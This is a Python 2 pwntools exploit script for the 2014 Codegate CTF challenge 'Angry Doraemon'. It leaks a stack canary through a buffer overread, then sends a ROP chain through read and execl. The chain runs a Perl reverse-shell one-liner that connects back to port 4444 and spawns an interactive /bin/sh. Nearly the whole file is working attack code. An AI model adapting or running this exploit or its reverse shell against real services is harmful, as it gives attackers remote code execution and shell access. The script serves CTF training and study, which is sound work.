exploit.py

#!/usr/bin/env python2

# Codegate Preliminary CTF 2014: Angry Doraemon
# https://github.com/ctfs/write-ups-2014/tree/master/codegate-preliminary-2014/angrydoraemon

from pwn import *

# 08048710 <execl@plt>:
#  8048710:	ff 25 4c b0 04 08    	jmp    DWORD PTR ds:0x804b04c
#  8048716:	68 80 00 00 00       	push   0x80
#  804871b:	e9 e0 fe ff ff       	jmp    8048600 <setsockopt@plt-0x10>
# 08048620 <read@plt>:
#  8048620:	ff 25 10 b0 04 08    	jmp    DWORD PTR ds:0x804b010
#  8048626:	68 08 00 00 00       	push   0x8
#  804862b:	e9 d0 ff ff ff       	jmp    8048600 <setsockopt@plt-0x10>
addr_execl_plt = 0x8048710
addr_read_plt  = 0x8048620

addr_pop3_ret = 0x080495bd # 0x080495bd: pop esi ; pop edi ; pop ebp ; ret  ;  (1 found)

addr_bin_sh = 0x804970d
addr_buf    = 0x804b0a0

socket_fd = 4

r = remote('localhost', 8888)

def choose_action(n):
    r.recvuntil('6.Give up\n>')
    r.sendline(str(n))

# leak canary
choose_action(4)
r.recvuntil('Are you sure? (y/n) ')
r.send('y' * 11)
r.recvuntil('y' * 10)
canary = u32(r.recv(4)) & 0xffffff00
log.info('leaked canary: 0x%x' % canary)

# reconnect
r.close()
r = remote('localhost', 8888)

# send ROP
choose_action(4)
r.recvuntil('Are you sure? (y/n) ')
payload = ''
payload += 'A' * 10
payload += p32(canary)
payload += 'BBBB'
payload += 'BBBB'
payload += 'BBBB'
payload += p32(addr_read_plt)
payload += p32(addr_pop3_ret)
payload += p32(socket_fd)
payload += p32(addr_buf)
payload += p32(0x100)
payload += p32(addr_execl_plt)
payload += 'CCCC'
payload += p32(addr_bin_sh)
payload += p32(addr_bin_sh)
payload += p32(addr_buf)
payload += p32(addr_buf + 3)
payload += p32(0)
r.send(payload)

# execl('-c', 'perl -e ...', NULL);
payload = ''
payload += '-c\x00'
payload += 'perl -e \'use Socket;$i="0.0.0.0";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'\x00'
r.send(payload)